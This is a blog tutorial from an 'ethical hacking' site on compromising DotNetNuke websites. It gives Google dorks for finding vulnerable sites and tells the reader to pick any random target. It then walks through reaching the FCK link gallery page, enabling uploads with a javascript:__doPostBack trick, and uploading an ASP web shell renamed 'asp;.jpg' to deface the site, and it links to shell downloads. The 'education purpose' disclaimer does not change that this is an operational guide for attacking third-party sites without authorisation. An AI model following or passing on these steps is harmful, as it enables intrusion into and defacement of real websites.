| Call Sahil Baghla for Seminar, Workshop & Guest Lecture |
 |
Subscribe & Don't Miss A Free Ethical Hacking Course
Website Hacking Series (DNN Hacking)- Dot Net Nuke EHacking & Security
Hi Friends, I am back on track after many days. I will be updating EthicalHacking1.com with new articles everyday.
There are many method by which website are being hacked. Today we will discuss about Dot Net Nuke Hacking.
It is explained here for education purpose. Don’t misuse it to create chaos.
What is DNN ?
DotNetNuke is the leading open source ASP.NET content management system and .NET web application development framework.
How it can be hacked ?
It can be hacked due to upload vulnerability in its coding. Still no of websites are not updated so still this vulnerability is present.
Step 1
Go to http://www.google.com
Step 2
Enter any one Google dork to find the vulnerable website.
:inurl:/tabid/36/language/en-US/Default.aspx
:inurl:/Fck/fcklinkgallery.aspx
Step 3
Now you are able to find any sites, select any random site
Step 4
For example take this site as
http://www.abc.com/Home/tabid/36/Lan…S/Default.aspx
Step 5
Replace /Home/tabid/36/Language/en-US/Default.aspx with
/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Download Code above to replace
Step 6
You are able to get a link gallery page as this page
If you are not to get page like this then try for other websites.
Step 7
As you get this page don’t do anything wait for the next step
Step 8
Select file option on the page and then do the next step
Step 9
Replace Url in address bar with a javascript as
javascript:__doPostBack(‘ctlURL$cmdUpload’,”)
Download Javascript Code Above
Step 10
Here you go now you are able to upload shell on this website. Remember one important thing this is .aspx website. So you are only able to asp shell.
Some asp shell works on some sites. I am giving link to some asp shells, still if you are able to find any good asp shell from google then provide link on comments too.
Click Here to download Asp shell.
Password for the file is www.ethicalhacking1.com
How to upload shell on this website ?
Uploading a shell file as example as hackinshell.asp is not possible we will upload it as hackingshell.asp;.jpg by changing it extension as
image file.
Example hackinshell.asp is changed as hackinshell.asp;.jpg
Now let show you uploading shell to deface this website.
Step 1. Click Browse button and upload the shell.
Step 2. After you upload the shell or any text file , it goes as
http://www.abc.com/portals/0/yourshellname.asp;.jpg
and when you try to open above url shell will open as
Step 3.
You are able to perform anything on the vulnerable website.
Eyes Get Opened about Dot Net Nuke Website Vunerability
Will write next tutorial about securing DNN website. So that if you can secure your DNN website then noone can hack it.
Sahil Baghla (Cyber Security Guru)
CEO | President
www.ethicalhacking1.com, www.eh1infotech.com, www.antihackingsociety.com
Did you enjoy this post? Why not leave a comment below and continue the conversation, or subscribe to my Email and get articles like this delivered automatically to your Email.
|
|
|
| ||||||||
|
|
|
| ||||||||
|
|
|
|
Awesome tutorial waiting for some more